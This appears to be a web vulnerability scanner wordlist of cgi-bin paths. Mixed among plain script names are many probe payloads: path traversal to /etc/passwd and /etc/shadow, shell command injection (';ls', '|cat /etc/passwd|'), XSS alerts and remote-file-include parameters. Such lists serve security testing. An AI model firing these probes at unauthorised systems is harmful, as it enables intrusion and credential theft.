addday/cgi-bin/addday.cgi
addday/cgi-bin/passwd.cgi
addday/cgi-bin/setup.cgi
cgi-bin/weblogin.cgi?username=admin%27%3bls%20%23&password=asdf
aktivate/cgi-bin/catgy.cgi
awcuser/cgi-bin/vcs
awstats/cgi-bin/awstats.pl
bbs/cgi-bin
bbscgi-bin
blog/cgi-bin
ccgi-bin
_cgi-bin
cgi-bin
cgi-bin/
cgi-bin/*
cgi-bin/02t1coc3.pl
cgi-bin/03rjg0de.pl
cgi-bin-1
cgi-bin1
cgi-bin/14all-1.1.cgi
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/1yvd3p86.pl
cgi-bin2
cgi-bin2/
cgi-bin/2dr2bj3d.pl
cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/321links.co.uk/confirmation.php
cgi-bin/3pelh3id.pl
cgi-bin/4bvgl8pe.pl
cgi-bin/5pzan9qu.pl
cgi-bin/6x0nl7ot.pl
cgi-bin/7orinv4x.pl
cgi-bin/7rgvgjf5.pl
cgi-bin/81rsnlm3.pl
cgi-bin/8c4pre38.pl
cgi-bina
cgi-bin/a1disp3.cgi
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../passwd
cgi-bin/a1stats/a1disp4.cgi
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp.cgi
cgi-bin/a4w0lqf2.pl
cgi-bin/abaddedit.asp
cgi-bin/abgaddedit.asp
cgi-bin/abgmanage.asp
cgi-bin/abimport.asp
cgi-bin/ablist.asp
cgi-bin/abmanage.asp
cgi-bin/about.asp
cgi-bin/abupload.asp
cgi-bin/.access
cgi-bin/acctman/amadmin.pl
cgi-bin/acfrightnow.cfg/php/enduser/std_adp.php
cgi-bin/acp/lib/inserts.sql
cgi-bin/addbanner.cgi
cgi-bin/addday.cgi
cgi-bin/addday/cgi-bin/addday.cgi
cgi-bin/addday/cgi-bin/passwd.cgi
cgi-bin/addday/cgi-bin/setup.cgi
cgi-bin/add_ftp.cgi
cgi-bin/adduser.cgi
cgi-bin/adinm.cgi
cgi-bin/admcgi/contents.htm
cgi-bin/admcgi/scripts/Fpadmcgi.exe
cgi-bin/admin/admin.cgi
cgi-bin/admin/artikeladmin.cgi
cgi-bin/admin.asp
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/admin/edit_startseitentext.cgi
cgi-bin/adminhot.cgi
cgi-bin/admin/index.cgi
cgi-bin/admin/param
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/admin/rubrikadmin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/admin/setup_edit.cgi
cgi-bin/admin/shophilfe_suche.cgi
cgi-bin/admin/upgrade.cgi
cgi-bin/adminwww.cgi
cgi-bin/adpassword.txt
cgi-bin/adsl.cgi
cgi-bin/adsl_init.cgi
cgi-bin/adspro/dhtml.pl
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse
cgi-bin/aglimpse.cgi
cgi-bin/album.pl
cgi-bin/alibaba.pl
cgi-bin/alibaba.pl\dir
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/allmanage.pl
cgi-bin/allmanageup.pl
cgi-bin/amadmin.pl
cgi-bin/amlite/amadmin.pl
cgi-bin/am.pl
cgi-bin/anacondaclip.pl
cgi-bin/animate.cgi
cgi-bin/anketoyla.asp
cgi-bin/announcements.asp
cgi-bin/anyboard.cgi
cgi-bin/anyboard.cgi/
cgi-bin/AnyBoard.cgi
cgi-bin/anyform
cgi-bin/anyform2
cgi-binap
cgi-bin/apcupsd.cgi
cgi-bin/apexec.pl
cgi-bin/applyConfig.p
cgi-bin/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
cgi-bin/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
cgi-bin/archie
cgi-bin/architext_query.cgi
cgi-bin/architext_query.pl
cgi-bin/ash
cgi-bin/astrocam.cgi
cgi-bin/at-admin.cgi
cgi-bin/AT-admin.cgi
cgi-bin/at-generate.cgi
cgi-bin/AT-generate.cgi
cgi-bin/athcgi.exe
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/atmail.pl
cgi-bin/auction/auction.cgi
cgi-bin/auction/auction.cgi?action=
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/auktion.cgi
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/auth_if.cgi?login
cgi-bin/authLogin.cgi
cgi-bin/awl/auctionweaver.pl
cgi-bin/awstats
cgi-bin/awstats/
cgi-bin/awstats-6.4/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/awstats.cgi
cgi-bin/awstats.pl
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axis-cgi/buffer/command.cgi
cgi-bin/axs.cgi
cgi-bin-backup
cgi-bin/backup/add-passwd.cgi
cgi-bin/Backup/add-passwd.cgi
cgi-bin/Backup/entrenos/suscripcion/index.php
cgi-bin/badmin.cgi
cgi-bin.bak
cgi-bin/bandwidth/index.cgi
cgi-bin/banner/ad-adv-160600.asp
cgi-bin/banner/ad-adv-300250.asp
cgi-bin/banner/ad-adv-72890.asp
cgi-bin/banner/ad-advs-160600.asp
cgi-bin/banner/ad.asp
cgi-bin/banner/ad-gst-160600.asp
cgi-bin/banner/ad-komli-160600.asp
cgi-bin/banner/banner.asp
cgi-bin/banner.cgi
cgi-bin/banner/click.asp
cgi-bin/BannerClick.asp
cgi-bin/banner/defaultbanner.asp
cgi-bin/bannereditor.cgi
cgi-bin/banner/test.asp
cgi-bin/banner/text-16090.asp
cgi-bin/banner/text-72815.asp
cgi-bin/bash
cgi-bin/bb-ack.sh
cgi-bin/bb-histlog.sh
cgi-bin/bb-hostsvc.sh
cgi-bin/bb-replog.sh
cgi-bin/bb-rep.sh
cgi-bin/bbs_forum.cgi
cgi-bin/bbs/read.cgi
cgi-bin/beta/redir.asp
cgi-bin/betsie/parserl.pl/<script>alert(
cgi-bin/bfenterprise/
cgi-bin/bfgather.exe/actionsite
cgi-bin/bgplg
cgi-bin/bhrss.py
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/bizdir/bizdir.cgi
cgi-bin/bizmail/bizmail.cgi
cgi-bin/blog
cgi-bin/blog/mt.cfg
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/boardpower/icq.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/book.pl+00
cgi-bin/boozt/admin/index.cgi
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bp620d1u.pl
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/bsml.pl
cgi-bin/budmail/data/admin.dat
cgi-bin/bugzilla
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/c32web.exe/changeadminpassword
cgi-bin/c32web.exe/CheckError
cgi-bin/c32web.exe/ShowAdminDir
cgi-bin/c32web.exe/ShowProgress
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/calendar
cgi-bin/calendar_admin.pl
cgi-bin/calendar/calendar.pl
cgi-bin/calendar/index.cgi
cgi-bin/calendar.pl
cgi-bin/calendar/Visitor.cgi
cgi-bin/calender_admin.pl
cgi-bin/calender.pl
cgi-bin/cal_make.pl
cgi-bin/captive.cgi
cgi-bin/cart32.exe
cgi-bin/cart32.exe/error
cgi-bin/cart32.exe/justsocks-AddIte
cgi-bin/cartcart.cgi
cgi-bin/cartmanager.cgi
cgi-bin/cart.pl
cgi-bin/cart.pl?db='
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=menu
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill-local.pl?cmd=menu
cgi-bin/ccbill/whereami.cgi
cgi-bin/cc_guestbook.pl
cgi-bin/cd-cgi/sscd_suncourier.pl
cgi-bin/c_download.cgi
cgi-bin/cfgwiz.exe
cgi-bin/cgforum.cgi
cgi-bin/cgi
cgi-bin/cgibox
cgi-bin/cgi/cgiproc?
cgi-bin/cgicso?query=aaa
cgi-bin/cgiforum.pl
cgi-bin/cgi-lib.pl
cgi-bin/cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-bin/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-bin/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgimail.exe
cgi-bin/cgi_process
cgi-bin/cgiproxy.fcgi
cgi-bin/CGIProxy.fcgi
cgi-bin/cgiServer.exx?command=dumpConfigFile(/etc/shadow)
cgi-bin/cgis/wwwboard/wwwboard.cgi
cgi-bin/cgi-sys/addalink.cgi
cgi-bin/cgi-sys/cgiecho
cgi-bin/cgi-sys/cgiemail
cgi-bin/cgi-sys/domainredirect.cgi
cgi-bin/cgi-sys/entropybanner.cgi
cgi-bin/cgi-sys/entropysearch.cgi
cgi-bin/cgi-sys/FormMail-clone.cgi
cgi-bin/cgi-sys/helpdesk.cgi
cgi-bin/cgi-sys/mchat.cgi
cgi-bin/cgi-sys/randhtml.cgi
cgi-bin/cgi-sys/realhelpdesk.cgi
cgi-bin/cgi-sys/realsignup.cgi
cgi-bin/cgi-sys/scgiwrap
cgi-bin/cgi-sys/signup.cgi
cgi-bin/cgi_system
cgi-bin/cgi-test.exe
cgi-bin/cgitest.exe
cgi-bin/cgi-win/cgitest.exe
cgi-bin/cgiwrap
cgi-bin/cgiwrap/
cgi-bin/cgiwrap/~nneul/
cgi-bin/cgiwrap/~root
cgi-bin/cgiwrap/~@users
cgi-bin/change-your-password.pl
cgi-bin/check.cgi
cgi-bin/check.cgi?file=../../../etc/passwd
cgi-bin/chetcpasswd.cgi
cgi-bin/chklogin.cgi
cgi-bin/chklogin.cgi?file=../../../etc/passwd
cgi-bin/chkwifi.cgi
cgi-bin/chpasswd.cgi
cgi-bin-church
cgi-bin/cilla.cg
cgi-bin/classified.cgi
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/classifieds/viewcat.cgi
cgi-bin/cleanup.asp
cgi-bin/clickcount/clickcount.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/clickresponder.pl
cgi-bin/cmd1.exe?/c+dir
cgi-bin/cmd.exe?/c+dir
cgi-bin/.cobalt
cgi-bin/.cobalt/message/message.cgi
cgi-bin/.cobalt/siteusermod/siteusermod.cgi
cgi-bin/coco.cgi
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/com5.java
cgi-bin/com5.pl
cgi-bin/command.cfg/php/enduser/std_adp.php
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/common/listrec.pl
cgi-bin/communimail/mailadmin.cgi
cgi-bin/communimail/templates.cgi
cgi-bin/compatible.cgi
cgi-bin/complete.asp
cgi-bin/compose.asp
cgi-bin/config.cgi
cgi-bin/config.exp
cgi-bin/connscheduler.cgi
cgi-bin/contact.asp
cgi-bin/contents.htm
cgi-bin/contribute.cgi
cgi-bin/contribute.pl
cgi-bin/cookie.cgi
cgi-bin/cookiemonster.cgi
cgi-bin/count.cgi
cgi-bin/Count.cgi
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counter/coco.cgi
cgi-bin/counter/count.cgi
cgi-bin/counterfiglet/nc
cgi-bin/counterfiglet/nc/f=
cgi-bin/counterfiglet-ord
cgi-bin/counter/fuck.cgi
cgi-bin/counter/nl/ord/lang=english(1)
cgi-bin/counter-ord
cgi-bin/cp/rac/nsManager.cgi
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csh
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csmailto.cgi
cgi-bin/CSMailto.cgi
cgi-bin/csmailto/csmailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/csnews.cgi
cgi-bin/csNews.cgi
cgi-bin/CSNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/cspassword.cgi
cgi-bin/csPassword.cgi
cgi-bin/csPassword.cgi?command=remove%20
cgi-bin/cspassword/cspassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/cstat.pl
cgi-bin/customer.pl
cgi-bin/cutecast/members
cgi-bin/cutecast/members/<username>.user
cgi-bin/cvename.cgi
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsblame.cgi?file=<script>alert('XSS')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('XSS')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
cgi-bincz
cgi-bin/dansguardian.pl
cgi-bin/dasp/fm_shell.asp
cgi-bin/data/fetch.php?page=
cgi-bin/date
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db4web_c/dbdirname/etc/hosts
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dbmlparser.exe
cgi-bin/dc8jhcfh.pl
cgi-bin/dcforms98.cgi
cgi-bin/dcforum.cgi
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/DCShop/Auth_data/auth_user_file.txt
cgi-bin/dcshop.cgi
cgi-bin/dcshop/orders/orders.txt
cgi-bin/DCShop/Orders/orders.txt
cgi-bin/ddns
cgi-bin/ddns.cgi
cgi-bin/ddns_start.cgi
cgi-bin-debug
cgi-bin/delall1.asp
cgi-bin/delall2.asp
cgi-bin/delconf.asp
cgi-bin/delmail.asp
cgi-bin/delmsg.asp
cgi-bin/dfire.cgi
cgi-bin/dhcp.cgi
cgi-bin/diagnose.cgi
cgi-bin/diagnostic.cgi
cgi-bin/diagnostics
cgi-bin/dial
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/discus/board-post.cgi
cgi-bin/discus/support/boanewmessages.cgi
cgi-bin/discus/support/boaprofile.cgi
cgi-bin/discus/support/board-admin.cgi
cgi-bin/discus/support/board-admin-menuonly.cgi
cgi-bin/discus/support/board-contact.cgi
cgi-bin/discus/support/board-image-lister.cgi
cgi-bin/discus/support/board-newmessages.cgi
cgi-bin/discus/support/board-post.cgi
cgi-bin/discus/support/board-post-form.cgi
cgi-bin/discus/support/board-profile.cgi
cgi-bin/discus/support/board-search.cgi
cgi-bin/discus/support/board-viewtree.cgi
cgi-bin/discus/support/boasearch.cgi
cgi-bin/discus/support/boaviewtree.cgi
cgi-bin/discus/support/discus.cgi
cgi-bin/discus/support/search.cgi
cgi-bin/disorder
cgi-bin/dispair.cgi
cgi-bin/displaytc.pl
cgi-bin/dmzholes.cgi
cgi-bin/dn.asp
cgi-bin/dna/viewAppletFsa.cgi
cgi-bin/dnewsweb
cgi-bin/dnewsweb.exe
cgi-bin/dns.cgi
cgi-bin/dnsforward.cgi
cgi-bin/donothing
cgi-bin/dose.pl
cgi-bin/dose.pl?daily&somefile.txt&|ls|
cgi-bin/download.cgi
cgi-bin/download/download.cgi
cgi-bin/downloadsys.pl
cgi-bin/drknow.cgi
cgi-bin/dumpenv.pl
cgi-bin/dumpenv.pl+00
cgi-bin/Dumpenv.pl+00
cgi-bin/eboard40/index2.cgi
cgi-bin/echo.bat
cgi-bin/e-cms/vis/vis.pl
cgi-bin/edit.pl
cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
cgi-bin/emailadmin.asp
cgi-bin/email.pl
cgi-bin/empower
cgi-bin/empower?db=whateverwhatever
cgi-bin/emsgb/easymsgb.pl
cgi-bin/emu/html/emumail.cgi
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi
cgi-bin/emumail.cgi?type=.%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/enivron.pl
cgi-bin/enter.cgi
cgi-bin/.env
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/environ.pl+00
cgi-bin/env.pl
cgi-bin/erba/start/
cgi-bin/errors/needinit.php?gallery_basedir=http://xxxxxxxx
cgi-bin/esp
cgi-bin/excite
cgi-bin/exec.cgi
cgi-bin/ex-logger.pl
cgi-bin/ExportSettings.sh
cgi-bin/extrahd.cgi
cgi-bin/ez2000/ezadmin.cgi
cgi-bin/ez2000/ezboard.cgi
cgi-bin/ez2000/ezman.cgi
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/feedback.asp
cgi-bin/feedbackprocess.asp
cgi-bin/ffileman.cgi
cgi-bin/.fhp
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/filemanager/utilRequest.cgi
cgi-bin/fileseek2.cgi
cgi-bin/FileSeek2.cgi
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/fileseek.cgi
cgi-bin/FileSeek.cgi
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/files.pl
cgi-bin/file_transfer.cgi
cgi-bin/finger
cgi-bin/finger.pl
cgi-bin/firewall.cgi
cgi-bin/firmwarecfg
cgi-bin/firmwareupgrade
cgi-bin/flexform
cgi-bin/flexform.cgi
cgi-bin/flserv.pl
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom.cgi?file=<script>alert('XSS')</script>
cgi-bin/fom/fom.cgi
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
cgi-bin/forgothomepage.asp
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/formmail
cgi-bin/formmail.cgi
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/FormMail.cgi?<script>alert(\
cgi-bin/formmail.pl
cgi-bin/fortune
cgi-bin/forum/showflat.pl
cgi-bin/forums/list.php
cgi-bin/forward.asp
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
cgi-bin/fpsrvadm.exe
cgi-bin/frameworkgui/attachMobileModem.pl
cgi-bin/frameworkgui/CSAttack.pl
cgi-bin/frameworkgui/guessPassword.pl
cgi-bin/frameworkgui/SEAttack.pl
cgi-bin/freeoffer.asp
cgi-bin/ftp/ftp.pl
cgi-bin/ftplocate/flsearch.pl
cgi-bin/ftplocate/flserv.pl
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/fwhosts.cgi
cgi-bing
cgi-bin/garuuavl.pl
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_mailto=xx;ls
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/gbpass.pl
cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;echo%20$((854625-1));echo%20ffffffffffffffff;
cgi-bin/generate.cgi
cgi-bin/generate.cgi?content=../../../../../../../../../../etc
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/get32.exe
cgi-bin/getadslattr.cgi
cgi-bin/getddnsattr.cgi
cgi-bin/getdoc.cgi
cgi-bin/getinetattr.cgi
cgi-bin/getinterip.cgi
cgi-bin/getlog.cgi
cgi-bin/getnettype.cgi
cgi-bin/get/New_GUI/get_sessionKey.asp
cgi-bin/gettransbitmap
cgi-bin/getupnp.cgi
cgi-bin/getwifiattr.cgi
cgi-bin/getwifi.cgi
cgi-bin/gff/env.pl
cgi-bin/gh.cgi
cgi-bin/gH.cgi
cgi-bin/gitweb/gitweb.pl
cgi-bin/gitweb.pl
cgi-bin/glimpse
cgi-bin/gm-authors.cgi
cgi-bin/gm.cgi
cgi-bin/gm-cplog.cgi
cgi-bin/Gozila.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/guestbook/guestbook.cgi
cgi-bin/guestbook/passwd
cgi-bin/guestbook.pl
cgi-bin/gw5/gwweb.exe
cgi-bin/gw5/gwweb.exe?get-context&htmlver=aaa
cgi-bin/gw5/gwweb.exe?help=bad-request
cgi-bin/gwweb.exe?help=bad-request
cgi-bin/gx.cgi
cgi-bin/gx.dll
cgi-bin/gx.exe
cgi-bin/h0qn7sfi.pl
cgi-bin/handler
cgi-bin/handler.cgi
cgi-bin/handler/netsonar;cat
cgi-bin/hardcore/webeditor/spellcheck.asp
cgi-bin/HASync/hasync.cgi
cgi-bin/haydn.exe
cgi-bin/healthcheck/banner.asp
cgi-bin/healthcheck/default.asp
cgi-bin/help.asp
cgi-bin/help/doIt.cgi
cgi-bin/hints.pl
cgi-bin/his-webshop.pl
cgi-bin/hitdoruk.net/seo.asp
cgi-bin/hitmatic/analyse.cgi
cgi-bin/hitview.cgi
cgi-bin/horde/test.php
cgi-bin/horde/test.php?mode=phpinfo
cgi-bin/hosts.cgi
cgi-bin/hpnst.exe?c=p+i=srvsysteminfo.html
cgi-bin/hsx.cgi
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/hsx.cgi?show=../../../../../../../../../../../passwd%00
cgi-bin/.htaccess
cgi-bin/.htaccess~
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/htimage.exe
cgi-bin/htimage.exe?2,2
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htmlmgr
cgi-bin/htmlscript
cgi-bin/htmlscript?../../../../etc/passwd
cgi-bin/.htpasswd
cgi-bin/htsearch
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch?-c/nonexistant
cgi-bin/http
cgi-bin/ibill.pm
cgi-bin/icat
cgi-bin/ids.cgi
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard.cg
cgi-bin/ikonboard/help.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/ilogin.asp
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/imagefolio.cgi
cgi-bin/imageFolio.cgi
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/imagemap.exe?2,2
cgi-bin/imggen.asp
cgi-bin/img.pl
cgi-bin/<IMG SRC="javascript:alert(cross_site_scripting.nasl);">.pl
cgi-bin/im_trbbs.cgi
cgi-bin/inbox.asp
cgi-bin/include/new-visitor.inc.php
cgi-bin/index.asp
cgi-bin/index.cgi
cgi-bin/index.html
cgi-bin/index.js0x70
cgi-bin/index.php
cgi-bin/index.pl
cgi-bin/index.pl/homels
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/installpatch.cgi?swc-token=%d&installfile=
cgi-bin/intellilogin.asp
cgi-bin/interaktiv.shop/front/shop_main.cgi
cgi-bin/interfaces.cgi
cgi-bin/intruders.cfg
cgi-bin/Intruders.cfg
cgi-bin/ion-p
cgi-bin/ion-p.exe
cgi-bin/ipinfo.cgi
cgi-bin/jailshell
cgi-bin/jammail/jammail.pl
cgi-bin/jammail.pl
cgi-bin/jarrewrite.sh
cgi-bin/jj
cgi-bin/jlr359eq.pl
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/kaiseki.cgi
cgi-bin/kerbynet
cgi-bin/kktg74e9.pl
cgi-bin/koha/opac-main.pl
cgi-bin/koha/opac-user.pl
cgi-bin/koxxmlcz.pl
cgi-bin/ksh
cgi-bin/l4an1jiu.pl
cgi-bin/lastlines.cgi?process
cgi-bin/lcgi/lcgitest.nlm
cgi-bin/lcgi/ndsobj.nlm
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
